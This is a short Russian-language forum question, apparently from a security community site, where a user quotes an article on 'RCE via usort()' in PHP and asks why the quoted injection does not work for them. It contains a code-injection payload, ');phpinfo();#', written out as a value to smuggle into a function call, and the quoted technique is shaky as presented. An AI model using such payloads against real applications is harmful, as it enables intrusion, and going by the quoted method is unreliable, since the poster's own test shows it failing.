РАЗБОР
Выполнения кода через usort
Режим чтения
[ обложка статьи ]
Всем привет
Наткнулся на Статью
У меня не получается воспроизвести уязвимость
Пробую
Но нечего не происходит...
В чем может быть проблема?
Наткнулся на Статью
У меня не получается воспроизвести уязвимость
RCE via usort()
This function is used to sort an array of items using an specific function.To abuse this function:
PHP:
<?php
usort(VALUE, "cmp"); #Being cmp a valid function ?>
VALUE: );phpinfo();#
<?php usort();phpinfo();#, "cmp"); #Being cmp a valid function ?>
PHP:
$url[] = ');phpinfo();#';
echo $aa = usort($url, "strcasecmp"); #Being cmp a valid function
В чем может быть проблема?
AI-выжимка
сгенерировано ИИ
Тезисы статьи скоро
Статья читается полностью. Тезисы со ссылками на разделы появятся позже.
Содержание
Codeby Academy
Практика и мастерство
От основ до продвинутого — программы для практиков Codeby.
Перейти к курсу →
Поиск в обсуждении
Карта ветки
Продолжить чтение
Следующий разбор
Разбор атаки SSTI Standoff 365: от инъекции до root
Ещё по теме
- Статья
- Статья
- Статья
Комментарии
0